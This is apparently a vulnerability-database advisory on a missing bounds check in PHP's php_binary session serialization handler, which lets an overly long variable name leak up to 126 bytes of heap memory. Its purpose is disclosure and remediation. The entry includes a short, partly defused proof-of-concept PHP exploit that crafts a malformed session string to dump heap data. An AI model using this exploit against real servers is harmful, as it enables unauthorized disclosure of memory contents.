|
|
Info |
Last Modified |
| about 1 year ago |
|
|
|
|
Keywords |
HPSBMA02215,SSRT071423
|
|
Description |
The php_binary serialization handler in the PHP session extension is missing a boundary check and may lead to an unauthorized information disclosure. The condition is triggered during the extraction of an overly long php_binary session data format variable name, which will disclose up to 126 bytes of heap data into PHP variables, resulting in a loss of confidentiality.
|
|
Classification |
Location:
Remote/Network Access Required
Attack Type:
Information Disclosure
Impact:
Loss of Confidentiality
Exploit:
Exploit Available
Disclosure:
OSVDB Verified
OSVDB:
Concern
|
|
Technical |
The php_binary session data format contains one entry per serialized variable.
Every entry contains:
- one byte size field containing the length of the variable name
- the variable name
- serialized data
------------
Exploit Code
------------
<?php
die("REMOVE THIS LINE");
ini_set("session.serialize_handler", "php_binary");
session_start();
$x = chr(36).str_repeat("A", 36)."N;".chr(127);
$data = $x;
session_decode($data);
$keys = array_keys($_SESSION);
$heapdump = $keys[1];
// code for reading from $heapdump goes here
?>
|
|
Solution |
Upgrade to PHP versions 4.4.5 or higher and PHP 5.2.1 or higher, as they have been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
|
|
Products |
|
PHP
 |
4.0 Beta 1 |
4.0 Beta 2 |
4.0 Beta 3 |
4.0 Beta 4 |
4.0.x |
4.1.x |
4.2.x |
4.4.0 |
4.4.2 |
4.4.1 |
4.3.x |
5.0.x |
4.4.3 |
5.2.0 |
5.2.1 |
4.4.5 |
4.4.6 |
4.4.4 |
5.1.x |
5.0 Release Candidate 3 |
5.0 Release Candidate 2 |
5.0 Release Candidate 1 |
5.0 Beta 4 |
5.0 Beta 3 |
5.0 Beta 2 |
5.0 Beta 1 |
4.0, Release Candidate 2 |
4.0, Release Candidate 1 |
3.x |
|
|
|
|
|
|
Credit |
- Stefan Esser - sesser
 hardened-php.net - www.hardened-php.net
|
|
BlogsProvided by Technorati
|
None found at this time
|
|
|
